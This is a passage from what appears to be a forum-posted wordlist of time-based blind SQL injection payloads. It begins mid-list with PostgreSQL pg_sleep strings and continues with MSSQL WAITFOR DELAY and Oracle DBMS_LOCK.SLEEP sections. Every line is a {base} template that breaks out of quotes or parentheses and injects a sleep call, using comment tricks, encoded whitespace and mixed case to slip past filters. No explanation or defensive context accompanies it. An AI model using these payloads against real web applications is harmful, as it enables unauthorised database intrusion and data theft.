{base}'))/**/oR/**/pg_sLeEp(10)--/**/wVbr
{base}'))%0COr%09pg_sLeEp(10)--%0AuVJn
{base}')) Or pg_sLeEp(10)# kFQt
{base}'))/**/oR/**/pg_sLeEp(10)#/**/wVbr
{base}'))%0COr%09pg_sLeEp(10)#%0AuVJn
{base}'))) ANd pg_sLeEp(10)
{base}')))/**/aND/**/pg_sLeEp(10)
{base}')))%0AanD%09pg_sLeEp(10)
{base}'))) ANd pg_sLeEp(10)-- kFQt
{base}')))/**/aND/**/pg_sLeEp(10)--/**/wVbr
{base}')))%0CanD%09pg_sLeEp(10)--%0AuVJn
{base}'))) ANd pg_sLeEp(10)# kFQt
{base}')))/**/aND/**/pg_sLeEp(10)#/**/wVbr
{base}')))%0CanD%09pg_sLeEp(10)#%0AuVJn
{base}'))) oR pg_sLeEp(10)
{base}')))/**/Or/**/pg_sLeEp(10)
{base}')))%0AoR%09pg_sLeEp(10)
{base}'))) Or pg_sLeEp(10)-- kFQt
{base}')))/**/oR/**/pg_sLeEp(10)--/**/wVbr
{base}')))%0COr%09pg_sLeEp(10)--%0AuVJn
{base}'))) Or pg_sLeEp(10)# kFQt
{base}')))/**/oR/**/pg_sLeEp(10)#/**/wVbr
{base}')))%0COr%09pg_sLeEp(10)#%0AuVJn
{base}") ANd pg_sLeEp(10)
{base}")/**/aND/**/pg_sLeEp(10)
{base}")%0AanD%09pg_sLeEp(10)
{base}") ANd pg_sLeEp(10)-- kFQt
{base}")/**/aND/**/pg_sLeEp(10)--/**/wVbr
{base}")%0CanD%09pg_sLeEp(10)--%0AuVJn
{base}") ANd pg_sLeEp(10)# kFQt
{base}")/**/aND/**/pg_sLeEp(10)#/**/wVbr
{base}")%0CanD%09pg_sLeEp(10)#%0AuVJn
{base}") oR pg_sLeEp(10)
{base}")/**/Or/**/pg_sLeEp(10)
{base}")%0AoR%09pg_sLeEp(10)
{base}") Or pg_sLeEp(10)-- kFQt
{base}")/**/oR/**/pg_sLeEp(10)--/**/wVbr
{base}")%0COr%09pg_sLeEp(10)--%0AuVJn
{base}") Or pg_sLeEp(10)# kFQt
{base}")/**/oR/**/pg_sLeEp(10)#/**/wVbr
{base}")%0COr%09pg_sLeEp(10)#%0AuVJn
{base}")) ANd pg_sLeEp(10)
{base}"))/**/aND/**/pg_sLeEp(10)
{base}"))%0AanD%09pg_sLeEp(10)
{base}")) ANd pg_sLeEp(10)-- kFQt
{base}"))/**/aND/**/pg_sLeEp(10)--/**/wVbr
{base}"))%0CanD%09pg_sLeEp(10)--%0AuVJn
{base}")) ANd pg_sLeEp(10)# kFQt
{base}"))/**/aND/**/pg_sLeEp(10)#/**/wVbr
{base}"))%0CanD%09pg_sLeEp(10)#%0AuVJn
{base}")) oR pg_sLeEp(10)
{base}"))/**/Or/**/pg_sLeEp(10)
{base}"))%0AoR%09pg_sLeEp(10)
{base}")) Or pg_sLeEp(10)-- kFQt
{base}"))/**/oR/**/pg_sLeEp(10)--/**/wVbr
{base}"))%0COr%09pg_sLeEp(10)--%0AuVJn
{base}")) Or pg_sLeEp(10)# kFQt
{base}"))/**/oR/**/pg_sLeEp(10)#/**/wVbr
{base}"))%0COr%09pg_sLeEp(10)#%0AuVJn
{base}"))) ANd pg_sLeEp(10)
{base}")))/**/aND/**/pg_sLeEp(10)
{base}")))%0AanD%09pg_sLeEp(10)
{base}"))) ANd pg_sLeEp(10)-- kFQt
{base}")))/**/aND/**/pg_sLeEp(10)--/**/wVbr
{base}")))%0CanD%09pg_sLeEp(10)--%0AuVJn
{base}"))) ANd pg_sLeEp(10)# kFQt
{base}")))/**/aND/**/pg_sLeEp(10)#/**/wVbr
{base}")))%0CanD%09pg_sLeEp(10)#%0AuVJn
{base}"))) oR pg_sLeEp(10)
{base}")))/**/Or/**/pg_sLeEp(10)
{base}")))%0AoR%09pg_sLeEp(10)
{base}"))) Or pg_sLeEp(10)-- kFQt
{base}")))/**/oR/**/pg_sLeEp(10)--/**/wVbr
{base}")))%0COr%09pg_sLeEp(10)--%0AuVJn
{base}"))) Or pg_sLeEp(10)# kFQt
{base}")))/**/oR/**/pg_sLeEp(10)#/**/wVbr
{base}")))%0COr%09pg_sLeEp(10)#%0AuVJn
{base}%' ANd pg_sLeEp(10)
{base}%'/**/aND/**/pg_sLeEp(10)
{base}%'%0AanD%09pg_sLeEp(10)
{base}%' ANd pg_sLeEp(10)-- kFQt
{base}%'/**/aND/**/pg_sLeEp(10)--/**/wVbr
{base}%'%0CanD%09pg_sLeEp(10)--%0AuVJn
{base}%' ANd pg_sLeEp(10)# kFQt
{base}%'/**/aND/**/pg_sLeEp(10)#/**/wVbr
{base}%'%0CanD%09pg_sLeEp(10)#%0AuVJn
{base}%' oR pg_sLeEp(10)
{base}%'/**/Or/**/pg_sLeEp(10)
{base}%'%0AoR%09pg_sLeEp(10)
{base}%' Or pg_sLeEp(10)-- kFQt
{base}%'/**/oR/**/pg_sLeEp(10)--/**/wVbr
{base}%'%0COr%09pg_sLeEp(10)--%0AuVJn
{base}%' Or pg_sLeEp(10)# kFQt
{base}%'/**/oR/**/pg_sLeEp(10)#/**/wVbr
{base}%'%0COr%09pg_sLeEp(10)#%0AuVJn
{base}) ANd pg_sLeEp(10)
{base})/**/aND/**/pg_sLeEp(10)
{base})%0AanD%09pg_sLeEp(10)
{base}) ANd pg_sLeEp(10)-- kFQt
{base})/**/aND/**/pg_sLeEp(10)--/**/wVbr
{base})%0CanD%09pg_sLeEp(10)--%0AuVJn
{base}) ANd pg_sLeEp(10)# kFQt
{base})/**/aND/**/pg_sLeEp(10)#/**/wVbr
{base})%0CanD%09pg_sLeEp(10)#%0AuVJn
{base}) oR pg_sLeEp(10)
{base})/**/Or/**/pg_sLeEp(10)
{base})%0AoR%09pg_sLeEp(10)
{base}) Or pg_sLeEp(10)-- kFQt
{base})/**/oR/**/pg_sLeEp(10)--/**/wVbr
{base})%0COr%09pg_sLeEp(10)--%0AuVJn
{base}) Or pg_sLeEp(10)# kFQt
{base})/**/oR/**/pg_sLeEp(10)#/**/wVbr
{base})%0COr%09pg_sLeEp(10)#%0AuVJn
{base})) ANd pg_sLeEp(10)
{base}))/**/aND/**/pg_sLeEp(10)
{base}))%0AanD%09pg_sLeEp(10)
{base})) ANd pg_sLeEp(10)-- kFQt
{base}))/**/aND/**/pg_sLeEp(10)--/**/wVbr
{base}))%0CanD%09pg_sLeEp(10)--%0AuVJn
{base})) ANd pg_sLeEp(10)# kFQt
{base}))/**/aND/**/pg_sLeEp(10)#/**/wVbr
{base}))%0CanD%09pg_sLeEp(10)#%0AuVJn
{base})) oR pg_sLeEp(10)
{base}))/**/Or/**/pg_sLeEp(10)
{base}))%0AoR%09pg_sLeEp(10)
{base})) Or pg_sLeEp(10)-- kFQt
{base}))/**/oR/**/pg_sLeEp(10)--/**/wVbr
{base}))%0COr%09pg_sLeEp(10)--%0AuVJn
{base})) Or pg_sLeEp(10)# kFQt
{base}))/**/oR/**/pg_sLeEp(10)#/**/wVbr
{base}))%0COr%09pg_sLeEp(10)#%0AuVJn
{base}))) ANd pg_sLeEp(10)
{base})))/**/aND/**/pg_sLeEp(10)
{base})))%0AanD%09pg_sLeEp(10)
{base}))) ANd pg_sLeEp(10)-- kFQt
{base})))/**/aND/**/pg_sLeEp(10)--/**/wVbr
{base})))%0CanD%09pg_sLeEp(10)--%0AuVJn
{base}))) ANd pg_sLeEp(10)# kFQt
{base})))/**/aND/**/pg_sLeEp(10)#/**/wVbr
{base})))%0CanD%09pg_sLeEp(10)#%0AuVJn
{base}))) oR pg_sLeEp(10)
{base})))/**/Or/**/pg_sLeEp(10)
{base})))%0AoR%09pg_sLeEp(10)
{base}))) Or pg_sLeEp(10)-- kFQt
{base})))/**/oR/**/pg_sLeEp(10)--/**/wVbr
{base})))%0COr%09pg_sLeEp(10)--%0AuVJn
{base}))) Or pg_sLeEp(10)# kFQt
{base})))/**/oR/**/pg_sLeEp(10)#/**/wVbr
{base})))%0COr%09pg_sLeEp(10)#%0AuVJn
{base}`) ANd pg_sLeEp(10)
{base}`)/**/aND/**/pg_sLeEp(10)
{base}`)%0AanD%09pg_sLeEp(10)
{base}`) ANd pg_sLeEp(10)-- kFQt
{base}`)/**/aND/**/pg_sLeEp(10)--/**/wVbr
{base}`)%0CanD%09pg_sLeEp(10)--%0AuVJn
{base}`) ANd pg_sLeEp(10)# kFQt
{base}`)/**/aND/**/pg_sLeEp(10)#/**/wVbr
{base}`)%0CanD%09pg_sLeEp(10)#%0AuVJn
{base}`) oR pg_sLeEp(10)
{base}`)/**/Or/**/pg_sLeEp(10)
{base}`)%0AoR%09pg_sLeEp(10)
{base}`) Or pg_sLeEp(10)-- kFQt
{base}`)/**/oR/**/pg_sLeEp(10)--/**/wVbr
{base}`)%0COr%09pg_sLeEp(10)--%0AuVJn
{base}`) Or pg_sLeEp(10)# kFQt
{base}`)/**/oR/**/pg_sLeEp(10)#/**/wVbr
{base}`)%0COr%09pg_sLeEp(10)#%0AuVJn
{base}'+ ANd pg_sLeEp(10)
{base}'+/**/aND/**/pg_sLeEp(10)
{base}'+%0AanD%09pg_sLeEp(10)
{base}'+ ANd pg_sLeEp(10)-- kFQt
{base}'+/**/aND/**/pg_sLeEp(10)--/**/wVbr
{base}'+%0CanD%09pg_sLeEp(10)--%0AuVJn
{base}'+ ANd pg_sLeEp(10)# kFQt
{base}'+/**/aND/**/pg_sLeEp(10)#/**/wVbr
{base}'+%0CanD%09pg_sLeEp(10)#%0AuVJn
{base}'+ oR pg_sLeEp(10)
{base}'+/**/Or/**/pg_sLeEp(10)
{base}'+%0AoR%09pg_sLeEp(10)
{base}'+ Or pg_sLeEp(10)-- kFQt
{base}'+/**/oR/**/pg_sLeEp(10)--/**/wVbr
{base}'+%0COr%09pg_sLeEp(10)--%0AuVJn
{base}'+ Or pg_sLeEp(10)# kFQt
{base}'+/**/oR/**/pg_sLeEp(10)#/**/wVbr
{base}'+%0COr%09pg_sLeEp(10)#%0AuVJn

MSSQL:
Код: 
WAITFOR DELAY '0:0:10'
WAITFOR/**/DELAY/**/'0:0:10'
WAITFOR%0ADELAY%09'0:0:10'
WAITFOR DELAY '0:0:10'-- jhRp
WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
WAITFOR DELAY '0:0:10'# WLsv
WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}' WAITFOR DELAY '0:0:10'
{base}" WAITFOR DELAY '0:0:10'
{base}') WAITFOR DELAY '0:0:10'
{base}')) WAITFOR DELAY '0:0:10'
{base}'))) WAITFOR DELAY '0:0:10'
{base}") WAITFOR DELAY '0:0:10'
{base}")) WAITFOR DELAY '0:0:10'
{base}"))) WAITFOR DELAY '0:0:10'
{base}%' WAITFOR DELAY '0:0:10'
{base}) WAITFOR DELAY '0:0:10'
{base})) WAITFOR DELAY '0:0:10'
{base}))) WAITFOR DELAY '0:0:10'
{base}`) WAITFOR DELAY '0:0:10'
{base}`)) WAITFOR DELAY '0:0:10'
{base}`))) WAITFOR DELAY '0:0:10'
{base};WAITFOR DELAY '0:0:10'
{base}';WAITFOR DELAY '0:0:10'
{base}";WAITFOR DELAY '0:0:10'
{base}+;WAITFOR DELAY '0:0:10'
{base}');WAITFOR DELAY '0:0:10'
{base}'));WAITFOR DELAY '0:0:10'
{base}')));WAITFOR DELAY '0:0:10'
{base}");WAITFOR DELAY '0:0:10'
{base}"));WAITFOR DELAY '0:0:10'
{base}")));WAITFOR DELAY '0:0:10'
{base}%';WAITFOR DELAY '0:0:10'
{base});WAITFOR DELAY '0:0:10'
{base}));WAITFOR DELAY '0:0:10'
{base})));WAITFOR DELAY '0:0:10'
{base}`);WAITFOR DELAY '0:0:10'
{base}`));WAITFOR DELAY '0:0:10'
{base}`)));WAITFOR DELAY '0:0:10'
{base}'+;WAITFOR DELAY '0:0:10'
{base}'/**/WAITFOR/**/DELAY/**/'0:0:10'
{base}"/**/WAITFOR/**/DELAY/**/'0:0:10'
{base}')/**/WAITFOR/**/DELAY/**/'0:0:10'
{base}'))/**/WAITFOR/**/DELAY/**/'0:0:10'
{base}')))/**/WAITFOR/**/DELAY/**/'0:0:10'
{base}")/**/WAITFOR/**/DELAY/**/'0:0:10'
{base}"))/**/WAITFOR/**/DELAY/**/'0:0:10'
{base}")))/**/WAITFOR/**/DELAY/**/'0:0:10'
{base}%'/**/WAITFOR/**/DELAY/**/'0:0:10'
{base})/**/WAITFOR/**/DELAY/**/'0:0:10'
{base}))/**/WAITFOR/**/DELAY/**/'0:0:10'
{base})))/**/WAITFOR/**/DELAY/**/'0:0:10'
{base}`)/**/WAITFOR/**/DELAY/**/'0:0:10'
{base}`))/**/WAITFOR/**/DELAY/**/'0:0:10'
{base}`)))/**/WAITFOR/**/DELAY/**/'0:0:10'
{base};WAITFOR/**/DELAY/**/'0:0:10'
{base}';WAITFOR/**/DELAY/**/'0:0:10'
{base}";WAITFOR/**/DELAY/**/'0:0:10'
{base}+;WAITFOR/**/DELAY/**/'0:0:10'
{base}');WAITFOR/**/DELAY/**/'0:0:10'
{base}'));WAITFOR/**/DELAY/**/'0:0:10'
{base}')));WAITFOR/**/DELAY/**/'0:0:10'
{base}");WAITFOR/**/DELAY/**/'0:0:10'
{base}"));WAITFOR/**/DELAY/**/'0:0:10'
{base}")));WAITFOR/**/DELAY/**/'0:0:10'
{base}%';WAITFOR/**/DELAY/**/'0:0:10'
{base});WAITFOR/**/DELAY/**/'0:0:10'
{base}));WAITFOR/**/DELAY/**/'0:0:10'
{base})));WAITFOR/**/DELAY/**/'0:0:10'
{base}`);WAITFOR/**/DELAY/**/'0:0:10'
{base}`));WAITFOR/**/DELAY/**/'0:0:10'
{base}`)));WAITFOR/**/DELAY/**/'0:0:10'
{base}'+;WAITFOR/**/DELAY/**/'0:0:10'
{base}'%0CWAITFOR%0ADELAY%09'0:0:10'
{base}"%0CWAITFOR%0ADELAY%09'0:0:10'
{base}')%0CWAITFOR%0ADELAY%09'0:0:10'
{base}'))%0CWAITFOR%0ADELAY%09'0:0:10'
{base}')))%0CWAITFOR%0ADELAY%09'0:0:10'
{base}")%0CWAITFOR%0ADELAY%09'0:0:10'
{base}"))%0CWAITFOR%0ADELAY%09'0:0:10'
{base}")))%0CWAITFOR%0ADELAY%09'0:0:10'
{base}%'%0CWAITFOR%0ADELAY%09'0:0:10'
{base})%0CWAITFOR%0ADELAY%09'0:0:10'
{base}))%0CWAITFOR%0ADELAY%09'0:0:10'
{base})))%0CWAITFOR%0ADELAY%09'0:0:10'
{base}`)%0CWAITFOR%0ADELAY%09'0:0:10'
{base}`))%0CWAITFOR%0ADELAY%09'0:0:10'
{base}`)))%0CWAITFOR%0ADELAY%09'0:0:10'
{base};WAITFOR%0ADELAY%09'0:0:10'
{base}';WAITFOR%0ADELAY%09'0:0:10'
{base}";WAITFOR%0ADELAY%09'0:0:10'
{base}+;WAITFOR%0ADELAY%09'0:0:10'
{base}');WAITFOR%0ADELAY%09'0:0:10'
{base}'));WAITFOR%0ADELAY%09'0:0:10'
{base}')));WAITFOR%0ADELAY%09'0:0:10'
{base}");WAITFOR%0ADELAY%09'0:0:10'
{base}"));WAITFOR%0ADELAY%09'0:0:10'
{base}")));WAITFOR%0ADELAY%09'0:0:10'
{base}%';WAITFOR%0ADELAY%09'0:0:10'
{base});WAITFOR%0ADELAY%09'0:0:10'
{base}));WAITFOR%0ADELAY%09'0:0:10'
{base})));WAITFOR%0ADELAY%09'0:0:10'
{base}`);WAITFOR%0ADELAY%09'0:0:10'
{base}`));WAITFOR%0ADELAY%09'0:0:10'
{base}`)));WAITFOR%0ADELAY%09'0:0:10'
{base}'+;WAITFOR%0ADELAY%09'0:0:10'
{base}' WAITFOR DELAY '0:0:10'-- jhRp
{base}" WAITFOR DELAY '0:0:10'-- jhRp
{base}') WAITFOR DELAY '0:0:10'-- jhRp
{base}')) WAITFOR DELAY '0:0:10'-- jhRp
{base}'))) WAITFOR DELAY '0:0:10'-- jhRp
{base}") WAITFOR DELAY '0:0:10'-- jhRp
{base}")) WAITFOR DELAY '0:0:10'-- jhRp
{base}"))) WAITFOR DELAY '0:0:10'-- jhRp
{base}%' WAITFOR DELAY '0:0:10'-- jhRp
{base}) WAITFOR DELAY '0:0:10'-- jhRp
{base})) WAITFOR DELAY '0:0:10'-- jhRp
{base}))) WAITFOR DELAY '0:0:10'-- jhRp
{base}`) WAITFOR DELAY '0:0:10'-- jhRp
{base}`)) WAITFOR DELAY '0:0:10'-- jhRp
{base}`))) WAITFOR DELAY '0:0:10'-- jhRp
{base};WAITFOR DELAY '0:0:10'-- jhRp
{base}';WAITFOR DELAY '0:0:10'-- jhRp
{base}";WAITFOR DELAY '0:0:10'-- jhRp
{base}+;WAITFOR DELAY '0:0:10'-- jhRp
{base}');WAITFOR DELAY '0:0:10'-- jhRp
{base}'));WAITFOR DELAY '0:0:10'-- jhRp
{base}')));WAITFOR DELAY '0:0:10'-- jhRp
{base}");WAITFOR DELAY '0:0:10'-- jhRp
{base}"));WAITFOR DELAY '0:0:10'-- jhRp
{base}")));WAITFOR DELAY '0:0:10'-- jhRp
{base}%';WAITFOR DELAY '0:0:10'-- jhRp
{base});WAITFOR DELAY '0:0:10'-- jhRp
{base}));WAITFOR DELAY '0:0:10'-- jhRp
{base})));WAITFOR DELAY '0:0:10'-- jhRp
{base}`);WAITFOR DELAY '0:0:10'-- jhRp
{base}`));WAITFOR DELAY '0:0:10'-- jhRp
{base}`)));WAITFOR DELAY '0:0:10'-- jhRp
{base}'+;WAITFOR DELAY '0:0:10'-- jhRp
{base}'/**/WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}"/**/WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}')/**/WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}'))/**/WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}')))/**/WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}")/**/WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}"))/**/WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}")))/**/WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}%'/**/WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base})/**/WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}))/**/WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base})))/**/WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}`)/**/WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}`))/**/WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}`)))/**/WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base};WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}';WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}";WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}+;WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}');WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}'));WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}')));WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}");WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}"));WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}")));WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}%';WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base});WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}));WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base})));WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}`);WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}`));WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}`)));WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}'+;WAITFOR/**/DELAY/**/'0:0:10'--/**/jhRp
{base}'%0DWAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}"%0DWAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}')%0DWAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}'))%0DWAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}')))%0DWAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}")%0DWAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}"))%0DWAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}")))%0DWAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}%'%0DWAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base})%0DWAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}))%0DWAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base})))%0DWAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}`)%0DWAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}`))%0DWAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}`)))%0DWAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base};WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}';WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}";WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}+;WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}');WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}'));WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}')));WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}");WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}"));WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}")));WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}%';WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base});WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}));WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base})));WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}`);WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}`));WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}`)));WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}'+;WAITFOR%09DELAY%0A'0:0:10'--%0CjhRp
{base}' WAITFOR DELAY '0:0:10'# WLsv
{base}" WAITFOR DELAY '0:0:10'# WLsv
{base}') WAITFOR DELAY '0:0:10'# WLsv
{base}')) WAITFOR DELAY '0:0:10'# WLsv
{base}'))) WAITFOR DELAY '0:0:10'# WLsv
{base}") WAITFOR DELAY '0:0:10'# WLsv
{base}")) WAITFOR DELAY '0:0:10'# WLsv
{base}"))) WAITFOR DELAY '0:0:10'# WLsv
{base}%' WAITFOR DELAY '0:0:10'# WLsv
{base}) WAITFOR DELAY '0:0:10'# WLsv
{base})) WAITFOR DELAY '0:0:10'# WLsv
{base}))) WAITFOR DELAY '0:0:10'# WLsv
{base}`) WAITFOR DELAY '0:0:10'# WLsv
{base}`)) WAITFOR DELAY '0:0:10'# WLsv
{base}`))) WAITFOR DELAY '0:0:10'# WLsv
{base};WAITFOR DELAY '0:0:10'# WLsv
{base}';WAITFOR DELAY '0:0:10'# WLsv
{base}";WAITFOR DELAY '0:0:10'# WLsv
{base}+;WAITFOR DELAY '0:0:10'# WLsv
{base}');WAITFOR DELAY '0:0:10'# WLsv
{base}'));WAITFOR DELAY '0:0:10'# WLsv
{base}')));WAITFOR DELAY '0:0:10'# WLsv
{base}");WAITFOR DELAY '0:0:10'# WLsv
{base}"));WAITFOR DELAY '0:0:10'# WLsv
{base}")));WAITFOR DELAY '0:0:10'# WLsv
{base}%';WAITFOR DELAY '0:0:10'# WLsv
{base});WAITFOR DELAY '0:0:10'# WLsv
{base}));WAITFOR DELAY '0:0:10'# WLsv
{base})));WAITFOR DELAY '0:0:10'# WLsv
{base}`);WAITFOR DELAY '0:0:10'# WLsv
{base}`));WAITFOR DELAY '0:0:10'# WLsv
{base}`)));WAITFOR DELAY '0:0:10'# WLsv
{base}'+;WAITFOR DELAY '0:0:10'# WLsv
{base}'/**/WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}"/**/WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}')/**/WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}'))/**/WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}')))/**/WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}")/**/WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}"))/**/WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}")))/**/WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}%'/**/WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base})/**/WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}))/**/WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base})))/**/WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}`)/**/WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}`))/**/WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}`)))/**/WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base};WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}';WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}";WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}+;WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}');WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}'));WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}')));WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}");WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}"));WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}")));WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}%';WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base});WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}));WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base})));WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}`);WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}`));WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}`)));WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}'+;WAITFOR/**/DELAY/**/'0:0:10'#/**/WLsv
{base}'%0DWAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}"%0DWAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}')%0DWAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}'))%0DWAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}')))%0DWAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}")%0DWAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}"))%0DWAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}")))%0DWAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}%'%0DWAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base})%0DWAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}))%0DWAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base})))%0DWAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}`)%0DWAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}`))%0DWAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}`)))%0DWAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base};WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}';WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}";WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}+;WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}');WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}'));WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}')));WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}");WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}"));WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}")));WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}%';WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base});WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}));WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base})));WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}`);WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}`));WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}`)));WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv
{base}'+;WAITFOR%0ADELAY%09'0:0:10'#%0CWLsv

Oracle:
Код: 
bEGiN DBMS_LOCK.SLEEP(10); ENd;
{base}',bEGiN DBMS_LOCK.SLEEP(10); ENd;
{base},bEGiN DBMS_LOCK.SLEEP(10); ENd;
bEGiN/**/DBMS_LOCK.SLEEP(10);/**/ENd;
{base}',bEGiN/**/DBMS_LOCK.SLEEP(10);/**/ENd;
{base},bEGiN/**/DBMS_LOCK.SLEEP(10);/**/ENd;
